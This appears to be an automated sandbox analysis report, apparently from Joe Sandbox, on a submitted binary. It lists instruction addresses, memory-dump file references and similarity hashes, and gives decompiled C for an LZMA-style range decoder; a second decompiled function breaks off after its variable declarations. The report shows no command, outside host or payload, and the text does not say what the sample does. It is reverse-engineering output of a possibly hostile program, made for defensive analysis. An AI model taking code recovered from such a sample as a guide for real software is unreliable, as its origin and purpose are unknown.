                                          0x0040e71c
                                          0x0040e71c
                                          0x0040e71f
                                          0x0040e720
                                          0x0040e720
                                          0x0040e724
                                          0x0040e724
                                          0x0040e724
                                          0x00000000
                                          0x0040e724
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e65b
                                          0x0040e65b
                                          0x0040e65e
                                          0x0040e661
                                          0x0040e663
                                          0x00000000
                                          0x00000000
                                          0x0040e665
                                          0x0040e668
                                          0x0040e66b
                                          0x0040e66e
                                          0x0040e6a8
                                          0x0040e6ae
                                          0x0040e6b9
                                          0x0040e6be
                                          0x0040e6c3
                                          0x0040e6c6
                                          0x0040e6c6
                                          0x00000000
                                          0x0040e6c6
                                          0x0040e670
                                          0x0040e670
                                          0x0040e671
                                          0x0040e674
                                          0x0040e674
                                          0x0040e678
                                          0x0040e67a
                                          0x0040e67d
                                          0x0040e68c
                                          0x0040e690
                                          0x0040e695
                                          0x0040e698
                                          0x0040e69b
                                          0x0040e69e
                                          0x0040e6a1
                                          0x0040e6a1
                                          0x0040e6a1
                                          0x0040e67d
                                          0x0040e6a3
                                          0x0040e6a3
                                          0x0040e6a3
                                          0x0040e6a3
                                          0x00000000
                                          0x0040e6c8
                                          0x0040e6c8
                                          0x0040e6c9
                                          0x0040e6cc
                                          0x0040e6cc
                                          0x00000000
                                          0x0040e65b
                                          0x0040e635
                                          0x0040e637
                                          0x0040e63a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e63c
                                          0x0040e63c
                                          0x0040e641
                                          0x0040e646
                                          0x0040e647
                                          0x0040e647
                                          0x0040e64c
                                          0x0040e64c
                                          0x00000000
                                          0x0040e64c
                                          0x0040e626
                                          0x0040e5d0
                                          0x0040e5d3
                                          0x0040e5d8
                                          0x0040e5dd
                                          0x0040e5e0
                                          0x0040e5e3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e5e3
                                          0x00000000
                                          0x0040e5d0
                                          0x0040e61b
                                          0x0040e61d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e61d
                                          0x0040e612
                                          0x0040e614
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e614
                                          0x0040e5eb
                                          0x0040e5f0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e5f2
                                          0x0040e5f2
                                          0x0040e5fe
                                          0x0040e603
                                          0x0040e604
                                          0x00000000
                                          0x0040e60b
                                          0x0040e60b
                                          0x0040e60b
                                          0x00000000
                                          0x0040e60b

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                                          • Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
                                          • Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                                          • Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004126B0 Relevance: .5, Instructions: 481COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004126B0(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				intOrPtr _t167;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t167 =  *((intOrPtr*)(_t351 + 0x14));
														_t344 =  *(_t351 + 0x28);
														_t128 = _t167 + 0x360; // 0x363
														_t206 = (_t298 << 7) + _t128;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}












































































                                          0x004126b7
                                          0x004126bd
                                          0x004126c0
                                          0x004126c3
                                          0x004126c8
                                          0x004126cb
                                          0x004126de
                                          0x004126e3
                                          0x004126ec
                                          0x004126f6
                                          0x0041271e
                                          0x00412723
                                          0x0041272a
                                          0x004128b6
                                          0x004128ba
                                          0x004128be
                                          0x004128c0
                                          0x004128ca
                                          0x004128d4
                                          0x004128f0
                                          0x004128f5
                                          0x004128fc
                                          0x0041291b
                                          0x0041291d
                                          0x0041291f
                                          0x00412927
                                          0x00412935
                                          0x00412951
                                          0x00412956
                                          0x00412959
                                          0x0041295f
                                          0x004129c8
                                          0x004129cc
                                          0x004129ce
                                          0x004129d8
                                          0x004129e2
                                          0x004129fe
                                          0x00412a03
                                          0x00412a0a
                                          0x00412a10
                                          0x00412a18
                                          0x00412a1a
                                          0x00412a22
                                          0x00412a3e
                                          0x00412a43
                                          0x00412a48
                                          0x00000000
                                          0x00412a4a
                                          0x00412a4a
                                          0x00412a4a
                                          0x00000000
                                          0x00412a24
                                          0x00412a28
                                          0x00000000
                                          0x00412a2e
                                          0x00412a34
                                          0x00412a37
                                          0x00412a3a
                                          0x00000000
                                          0x00412a3a
                                          0x00412a28
                                          0x00412a0c
                                          0x00412a0c
                                          0x00000000
                                          0x00412a0c
                                          0x004129e4
                                          0x004129e8
                                          0x00000000
                                          0x004129ee
                                          0x004129f4
                                          0x004129f7
                                          0x004129f9
                                          0x004129fa
                                          0x00000000
                                          0x004129fa
                                          0x004129e8
                                          0x00412961
                                          0x00412969
                                          0x0041296d
                                          0x00412971
                                          0x00412979
                                          0x00412997
                                          0x0041299c
                                          0x004129a1
                                          0x00412a4e
                                          0x00412a4e
                                          0x00412a50
                                          0x00412a52
                                          0x00412a56
                                          0x00412a5a
                                          0x00412a62
                                          0x00000000
                                          0x004129a7
                                          0x004129ad
                                          0x004129c5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004129ad
                                          0x0041297b
                                          0x0041297f
                                          0x00000000
                                          0x00412985
                                          0x00412988
                                          0x00412990
                                          0x00412992
                                          0x00412993
                                          0x00000000
                                          0x00412993
                                          0x0041297f
                                          0x00412979
                                          0x00412937
                                          0x0041293b
                                          0x00000000
                                          0x00412941
                                          0x00412947
                                          0x0041294a
                                          0x0041294d
                                          0x00000000
                                          0x0041294d
                                          0x0041293b
                                          0x004128fe
                                          0x004128fe
                                          0x00412900
                                          0x00412908
                                          0x0041290e
                                          0x00412a68
                                          0x00412a68
                                          0x00412a71
                                          0x00412a8d
                                          0x00412a92
                                          0x00412a95
                                          0x00412a9b
                                          0x00412ab1
                                          0x00412ab5
                                          0x00412ab7
                                          0x00412abf
                                          0x00412adb
                                          0x00412ae0
                                          0x00412ae5
                                          0x00412afd
                                          0x00412aff
                                          0x00412b01
                                          0x00412b07
                                          0x00412b0c
                                          0x00412ae7
                                          0x00412ae9
                                          0x00412aee
                                          0x00412af0
                                          0x00412af7
                                          0x00412af7
                                          0x00000000
                                          0x00412ac1
                                          0x00412ac5
                                          0x00000000
                                          0x00412acb
                                          0x00412ad1
                                          0x00412ad4
                                          0x00412ad6
                                          0x00412ad7
                                          0x00000000
                                          0x00412ad7
                                          0x00412ac5
                                          0x00412a9d
                                          0x00412a9f
                                          0x00412aa1
                                          0x00412aa5
                                          0x00412aa7
                                          0x00412b14
                                          0x00412b14
                                          0x00000000
                                          0x00412b20
                                          0x00412b26
                                          0x00412b42
                                          0x00412b4b
                                          0x00412b50
                                          0x00412b58
                                          0x00412b5a
                                          0x00412b5c
                                          0x00412b52
                                          0x00412b52
                                          0x00412b54
                                          0x00412b54
                                          0x00412b60
                                          0x00412b66
                                          0x00412b70
                                          0x00412b77
                                          0x00000000
                                          0x00412b7d
                                          0x00412b80
                                          0x00412b82
                                          0x00412b82
                                          0x00412b87
                                          0x00412b8b
                                          0x00412b92
                                          0x00412b92
                                          0x00412b99
                                          0x00412ba0
                                          0x00412ba0
                                          0x00412baa
                                          0x00000000
                                          0x00412bac
                                          0x00412bb0
                                          0x00000000
                                          0x00412bb6
                                          0x00412bbd
                                          0x00412bc0
                                          0x00412bc2
                                          0x00000000
                                          0x00412bc2
                                          0x00412bb0
                                          0x00000000
                                          0x00412bc3
                                          0x00412bc8
                                          0x00412bcd
                                          0x00412bd5
                                          0x00412bd7
                                          0x00412bd9
                                          0x00412bcf
                                          0x00412bcf
                                          0x00412bd1
                                          0x00412bd1
                                          0x00412bdd
                                          0x00412be2
                                          0x00412be8
                                          0x00000000
                                          0x00412bee
                                          0x00412bf2
                                          0x00412bf6
                                          0x00412c15
                                          0x00412c19
                                          0x00412c20
                                          0x00412c26
                                          0x00000000
                                          0x00412c28
                                          0x00412c2a
                                          0x00000000
                                          0x00412c30
                                          0x00412c37
                                          0x00412c3a
                                          0x00412c3c
                                          0x00000000
                                          0x00412c3c
                                          0x00412c2a
                                          0x00000000
                                          0x00412c3d
                                          0x00412c3d
                                          0x00412c49
                                          0x00412c4b
                                          0x00412c4b
                                          0x00412c58
                                          0x00412c5c
                                          0x00000000
                                          0x00412bf8
                                          0x00412c0f
                                          0x00412c61
                                          0x00412c61
                                          0x00412c70
                                          0x00412c74
                                          0x00412c7e
                                          0x00000000
                                          0x00412c80
                                          0x00412c84
                                          0x00000000
                                          0x00412c8a
                                          0x00412c91
                                          0x00412c94
                                          0x00412c96
                                          0x00000000
                                          0x00412c96
                                          0x00412c84
                                          0x00000000
                                          0x00412c97
                                          0x00412c9c
                                          0x00412ca1
                                          0x00412ca9
                                          0x00412cab
                                          0x00412cad
                                          0x00412ca3
                                          0x00412ca3
                                          0x00412ca5
                                          0x00412ca5
                                          0x00412cb1
                                          0x00412cb1
                                          0x00000000
                                          0x00412cb4
                                          0x00412bf6
                                          0x00412be8
                                          0x00412b68
                                          0x00412b68
                                          0x00000000
                                          0x00412b68
                                          0x00412b28
                                          0x00412b2c
                                          0x00000000
                                          0x00412b32
                                          0x00412b38
                                          0x00412b3b
                                          0x00412b3e
                                          0x00000000
                                          0x00412b3e
                                          0x00412b2c
                                          0x00000000
                                          0x00412b26
                                          0x00412b20
                                          0x00412a73
                                          0x00412a77
                                          0x00000000
                                          0x00412a7d
                                          0x00412a83
                                          0x00412a86
                                          0x00412a89
                                          0x00000000
                                          0x00412a89
                                          0x00412a77
                                          0x00412a71
                                          0x004128d6
                                          0x004128da
                                          0x00000000
                                          0x004128e0
                                          0x004128e6
                                          0x004128e9
                                          0x004128eb
                                          0x004128ec
                                          0x00000000
                                          0x004128ec
                                          0x004128da
                                          0x00412730
                                          0x00412730
                                          0x0041273f
                                          0x00412743
                                          0x0041274b
                                          0x00412750
                                          0x00412752
                                          0x00412752
                                          0x00412782
                                          0x00412782
                                          0x00412789
                                          0x0041281c
                                          0x0041281f
                                          0x00412824
                                          0x0041282b
                                          0x00412826
                                          0x00412826
                                          0x00412826
                                          0x00412834
                                          0x00412838
                                          0x0041283d
                                          0x00412842
                                          0x00412846
                                          0x0041284a
                                          0x0041284c
                                          0x0041285a
                                          0x00412864
                                          0x00000000
                                          0x00000000
                                          0x00412866
                                          0x0041286e
                                          0x00000000
                                          0x00412874
                                          0x0041287a
                                          0x0041287d
                                          0x00412880
                                          0x00000000
                                          0x00412880
                                          0x00000000
                                          0x00412884
                                          0x00412889
                                          0x00412890
                                          0x0041289a
                                          0x0041289c
                                          0x0041289e
                                          0x00412892
                                          0x00412892
                                          0x00412894
                                          0x00412896
                                          0x00412896
                                          0x004128a2
                                          0x004128aa
                                          0x00000000
                                          0x004128b0
                                          0x004128b0
                                          0x00000000
                                          0x004128b0
                                          0x00000000
                                          0x004128aa
                                          0x0041278f
                                          0x0041278f
                                          0x004127a0
                                          0x004127a4
                                          0x004127ae
                                          0x00000000
                                          0x004127b0
                                          0x004127b0
                                          0x004127b8
                                          0x00000000
                                          0x004127be
                                          0x004127c4
                                          0x004127c7
                                          0x004127ca
                                          0x00000000
                                          0x004127ca
                                          0x004127b8
                                          0x00000000
                                          0x004127ce
                                          0x004127d3
                                          0x004127d8
                                          0x004127e0
                                          0x004127e2
                                          0x004127e4
                                          0x004127da
                                          0x004127da
                                          0x004127dc
                                          0x004127dc
                                          0x004127e8
                                          0x004127f0
                                          0x004127f0
                                          0x004127f8
                                          0x004127f8
                                          0x004127fc
                                          0x00412802
                                          0x00412819
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00412802
                                          0x00412789
                                          0x004126f8
                                          0x004126f8
                                          0x00412700
                                          0x00412714
                                          0x00412717
                                          0x0041271a
                                          0x00000000
                                          0x00412705
                                          0x00412705
                                          0x0041270b
                                          0x0041270b
                                          0x00412700
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                          • Instruction ID: 16771a17edc265a66ec67cf10f30b53a928448ec08439b5136306a35d4d76ba5
                                          • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                          • Instruction Fuzzy Hash: 3D023C72A042114BD719CE18C6802BDBBE2FBD5350F150A3FE4A6D7684D7B898E8C799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004162A6 Relevance: .3, Instructions: 259COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004162A6(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
